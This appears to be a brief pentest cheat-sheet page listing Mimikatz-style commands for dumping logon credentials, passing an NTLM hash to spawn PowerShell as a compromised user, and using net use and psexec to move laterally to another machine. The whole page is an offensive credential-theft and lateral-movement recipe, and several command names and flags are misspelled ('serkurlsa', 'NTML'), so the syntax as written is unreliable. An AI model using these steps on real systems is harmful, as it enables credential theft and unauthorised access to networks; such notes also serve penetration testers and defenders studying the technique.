serkurlsa:logonpasswords
Copy user's NTML hash
serkurlsa::pth /user:compromised_user /domain:domain.com /ntml:copied_hash /run:PowerShell.exe
net use \\lateral-machine
.\psexec.exe \\lateral-machine cmd.exe
Last updated 1 year ago